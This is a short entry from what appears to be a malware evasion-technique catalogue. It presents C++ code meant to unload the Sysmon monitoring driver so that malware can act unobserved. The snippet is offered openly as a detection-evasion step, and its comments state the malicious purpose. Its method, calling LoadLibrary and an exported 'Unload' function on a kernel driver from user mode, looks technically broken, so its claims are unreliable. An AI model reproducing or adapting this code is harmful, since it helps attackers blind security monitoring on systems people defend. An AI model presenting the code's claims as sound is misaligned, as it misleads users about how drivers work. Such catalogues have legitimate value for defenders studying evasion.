(C++) Unloading Sysmon Driver by Unprotect

Created the Wednesday 07 December 2022. Updated 5 months, 4 weeks ago.

Description:

This code uses the LoadLibrary() and GetProcAddress() functions to load the Sysmon driver and get the address of its Unload() function. It then calls the Unload() function to unload the driver, which will cause Sysmon to stop recording events and thus evade detection by Sysmon. After the driver has been unloaded, the malware can proceed with its malicious actions without being monitored by Sysmon.

Code

            // Load the Sysmon driver
HMODULE hModule = LoadLibrary("sysmondrv");

// Check if the driver was loaded successfully
if (hModule != NULL)
{
    // Get the address of the driver's Unload() function
    PFN_UNLOAD pfnUnload = (PFN_UNLOAD) GetProcAddress(hModule, "Unload");

    // Check if the Unload() function was found
    if (pfnUnload != NULL)
    {
        // Call the Unload() function to unload the driver
        pfnUnload();

        // The Sysmon driver has been unloaded
        // Malware can now proceed with its malicious actions without being monitored by Sysmon
        // ...
    }
}